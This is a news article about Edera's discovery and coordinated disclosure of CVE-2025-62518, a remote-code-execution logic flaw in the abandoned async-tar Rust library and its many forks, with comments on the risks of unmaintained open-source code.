Researchers uncover remote code execution flaw in abandoned Rust code library
Security specialists at Edera discovered and disclosed a high-severity vulnerability in an early and since-abandoned code for an open-source async tar archive library for the Rust programming language.
Researchers warned that potential exploitation, which allows for remote code execution, could bear major impacts due to widespread forking and a lack of visibility into the code’s use.
“Given its presence in critical, widely-deployed tools like the uv package manager, the potential impact on build systems and production environments across many companies is substantial,” Alex Zenla, chief technology officer and co-founder at Edera, told CyberScoop in an email.
The boundary-parsing vulnerability — CVE-2025-62518, which has a CVSS rating of 8.1 — affects the async-tar Rust library and many forks, including tokio-tar, the Python package manager uv, testcontainers, wasmCloud, astral-tokio-tar and krata-tokio-tar. The most-popular fork — tokio-tar — has more than 5 million downloads on crates.io and is no longer maintained, according to Edera.
“This vulnerability is a textbook case of the open-source abandonware crisis. The original bug was introduced in an early version of the code that was then repeatedly forked as the original project became unmaintained,” Zenla said.
“The bug was replicated across a deep lineage of these forks,” she added. “When one project stops maintaining code, the bug gets inherited by the entire downstream family, creating a systemic risk that’s incredibly difficult to track and patch efficiently.”
Edera discovered the vulnerability during a development push on its internal platforms Aug. 21. The cybersecurity company created patches the next day and worked to get the fixes into as many active forks and open-source projects as possible before it publicly disclosed the defect Tuesday.
Zenla said tokio-tar and its forks are the foundation for async archive processing across the Rust ecosystem. These tar archives are fundamental for distribution, presenting a vast scope of potential impact, she added.
“The most concerning part is the unawareness,” Zenla said. “This vulnerable code is often an indirect dependency, buried deep in a build tool or container pipeline. Most end-users or businesses don’t even know they are running it, which is why public disclosure is a critical remediation step.”
Attackers can exploit the vulnerability and achieve remote code execution through file overwriting, according to Edera. The defect is not a complex memory corruption issue, but rather a logic flaw and considered easy to exploit, Zenla said.
Rust is widely acknowledged as a more secure programming language because it eliminates memory safety vulnerabilities that are common in C and C++. Yet, CVE-2025-62518, which Edera dubbed “TARmageddon,” proves that no language is completely secure and safer languages are still susceptible to human errors, Zenla said.
The defect also serves as another reminder of the risks lurking in open-source code, particularly when the chain of responsibility breaks as original versions are abandoned or no longer maintained.
“This meant we couldn’t just submit one patch upstream. We had to engage in a difficult, decentralized disclosure — tracking down and coordinating with multiple active forks and downstream consumers to ensure the patch was applied everywhere,” Zenla said.
“When a project is truly abandoned, responsibility becomes a messy, manual, and highly inefficient process for the ecosystem to resolve.”
